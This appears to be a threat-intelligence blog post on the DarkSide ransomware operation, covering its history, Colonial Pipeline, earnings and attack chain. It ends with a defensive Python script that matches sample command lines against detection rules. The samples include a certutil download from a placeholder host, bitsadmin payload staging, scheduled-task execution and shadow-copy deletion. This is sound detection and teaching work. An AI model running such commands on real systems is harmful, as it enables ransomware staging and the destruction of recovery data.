DarkSide: The Rise and The Fall

Cybercriminal activity of the DarkSide gang was first spotted on August 10th, 2020, when the group made an initial announcement on its blog hosted on the Tor network. The post immediately caught the attention of the information security industry, not least because of its confident tone: the operators stated that they already had previous experience in this kind of operation, had earned millions partnering with other cryptolockers, and were not coming from nowhere.

The post also made clear that the group had a ‘code of conduct’ regarding the types of industries its affiliates would be allowed to target with the malware: attacks were to be limited to companies able to pay the requested amount, as determined by a business analysis of their net income, and were not to target the medical and education sectors, not-for-profit organizations, or government entities.

Finally, after a series of successful attacks in which several companies had their data encrypted and others were double-extorted by additionally having sensitive data exposed, the operators failed to keep a low profile in the media and to avoid major attention from law enforcement. At the beginning of May 2021, one of its affiliates inadvertently hit Colonial Pipeline, the largest pipeline system for refined oil products in the United States. The event drew a lot of attention to the operation and, after an unsuccessful attempt by the group to reduce tension, the servers were allegedly seized on May 13th; the next day the threat actors claimed to have lost access to their payment and server accounts. Over £63 million in Bitcoin ransom payments, extorted from 47 victims in 9 months of operation, were made to DarkSide.

Key Takeaways

  • The group is notable for its use of marketing techniques in an attempt to gain some legitimacy or credibility with victims and the public, such as contact with the media, partnerships with decryption companies, purported charitable donations, performing a business analysis before engaging in any attack and, finally, a declaration of moral principles at the start of the operation
  • DarkSide ransomware operation managed to recruit multiple operators, therefore the initial foothold tactics, techniques and procedures used by attackers may differ depending on the victim and the affiliate
  • CIS (Commonwealth of Independent States) countries are not targeted by the malware, and it has similarities in design to, and relationships with, the other Russian-speaking ransomware group REvil, which is evidence that says a lot about the operators’ location
  • The estimated earnings of the gang were over $90 million in Bitcoin, coming from 47 different victims in just 9 months, which shows how effective the operation was for the operators and their affiliates
  • Although the number of DarkSide’s victims is lower than that of other well-known ransomware groups, the approach of using marketing techniques and only targeting companies that can pay proved to be a profitable plan for the group

Ransomware Operation: Threat Profile

Russian-speaking Darknet hacking forums such as XSS and Exploit were the main communication channels used by the operators to advertise their product and recruit their multiple affiliates during the operation. The user ‘darksupp’ was a central figure in advertising the Ransomware-as-a-Service product through these Darknet channels.

Shortly after the operation became known and malware samples became available for analysis, it was confirmed that the malicious software implemented techniques to avoid targeting CIS (Commonwealth of Independent States) countries. It was also noticed that the ransom note has many structural similarities with the REvil ransomware. Researchers see these characteristics as evidence of the operators’ real location.

Victims’ exfiltrated data was stored on multiple distributed storage services, allegedly in Iran, and according to the ransom note the data remained available for at least 6 months after upload. Even after the operation’s shutdown, one of the CDNs used for storing victims’ data, highlighted in Figure 1, is still live at the time of this writing.

Leaving aside the countries the ransomware does not target and the companies that paid the ransom before their data was exposed, the DarkSide group managed to victimize and expose 99 companies from different locations around the world that did not pay the ransom throughout its roughly 9-10 months of operation at the time of this writing, according to DarkTracer. Figure 2 shows a mind map of victims by month.

On May 14th, a post about the seizure of the operation was made on the XSS forum on behalf of the DarkSide group by the user ‘UNKN’, as seen in Figure 3. This user is known to be the main figure behind the REvil ransomware.

Attack and Behaviors Overview

DarkSide ransomware operation managed to recruit multiple operators, therefore the initial foothold techniques used by attackers may differ depending on the victim and the affiliate. FireEye has identified at least 5 different threat clusters distributing the malware.

After gaining access to the affected system, the intruders collect and exfiltrate as much data as possible from the victim, uploading it to cloud-based hosting providers and storage services such as pCloud and using Rclone to transfer the data over SFTP and SMB.

PowerShell is then used to download the malicious binary, abusing utilities such as Certutil.exe and Bitsadmin.exe. After that, PowerShell is also used to create a shared folder on the infected machine to store a copy of the malware.

The threat clusters identified by FireEye make use of tools such as Advanced IP Scanner, BloodHound and Cobalt Strike, and of the RDP protocol, for internal reconnaissance and lateral movement within the victim’s environment.

The attackers aim for the Domain Controller, where they dump the SAM hive and download the malicious binary from the previously created shared folder. The binary is stored in a folder created on the DC itself and named after the company. Later, the damage is maximized by distributing the binary from the shared folder to other reachable hosts in the network, leveraging Bitsadmin.exe.

Finally, after exfiltrating data from the environment, the ransomware file is executed on the DC through a scheduled task. The malware uses the language packs installed on the infected system as a condition to determine whether the encryption process proceeds. It uninstalls the Volume Shadow Copy Service (VSS) and deletes shadow copies using PowerShell.
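As an added example (not from the original post or any of the referenced reports), the Python script below runs simple detection logic for the stages just described over constructed process-creation events, grouping hits per host so that a machine where several stages co-occur, as the DC does above, is escalated first. Host names, paths, the share name, rule names and the EXAMPLE-HOST URL are placeholders.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (Sysmon Event ID 1 style); host names,
# paths, share name and the EXAMPLE-HOST URL are placeholders, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil.exe -urlcache -split -f http://EXAMPLE-HOST/stage.bin C:\Users\Public\stage.bin"},
    {"host": "WS01", "image": r"C:\Windows\System32\net.exe",
     "cmd": r"net share data$=C:\Users\Public /grant:everyone,FULL"},
    {"host": "DC01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer job /download /priority high \\WS01\data$\stage.bin C:\ACME\stage.bin"},
    {"host": "DC01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r"schtasks /create /tn Update /tr C:\ACME\stage.bin /sc once /st 02:00"},
    {"host": "DC01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -c Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"},
    {"host": "WS02", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil.exe -verify C:\certs\corp.cer"},  # legitimate use: must not fire
]

# (stage, image regex, command-line regex); stages follow the steps in the write-up.
RULES = [
    ("lolbin_download", r"certutil\.exe$", r"-urlcache|-split"),
    ("lolbin_download", r"bitsadmin\.exe$", r"/transfer|/download"),
    ("share_created", r"net1?\.exe$", r"\bshare\s+\S+="),
    ("scheduled_task", r"schtasks\.exe$", r"/create"),
    ("shadow_copy_deletion", r"(powershell|vssadmin|wmic)\.exe$", r"shadowcopy.*delete|delete\s+shadows"),
]

def match_stages(event):
    """Return the set of stages an event matches (normally zero or one)."""
    image, cmd = event["image"].lower(), event["cmd"].lower()
    return {stage for stage, img_re, cmd_re in RULES
            if re.search(img_re, image) and re.search(cmd_re, cmd)}

def triage(events):
    """Map each host to the distinct stages observed on it; hosts with no hit are dropped."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= match_stages(ev)
    return {host: stages for host, stages in per_host.items() if stages}

def likely_chain(per_host, min_stages=3):
    """Hosts where several stages co-occur look like the DC in the write-up: escalate first."""
    return sorted(host for host, stages in per_host.items() if len(stages) >= min_stages)

if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for host, stages in sorted(found.items()):
        print(f"{host}: {', '.join(sorted(stages))}")
    print("escalate first:", likely_chain(found))
```

The image match is anchored on the executable name because the write-up describes abuse of the legitimate system binaries themselves, so only the command line distinguishes the benign certutil certificate check on WS02 from the staging download on WS01.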

Reference Links

  1. https://www.digitalshadows.com/blog-and-research/not-another-ransomware-blog-initial-access-brokers-and-their-role/
  2. https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html
  3. https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short
  4. https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime
  5. https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin
  6. https://attack.mitre.org/versions/v9/




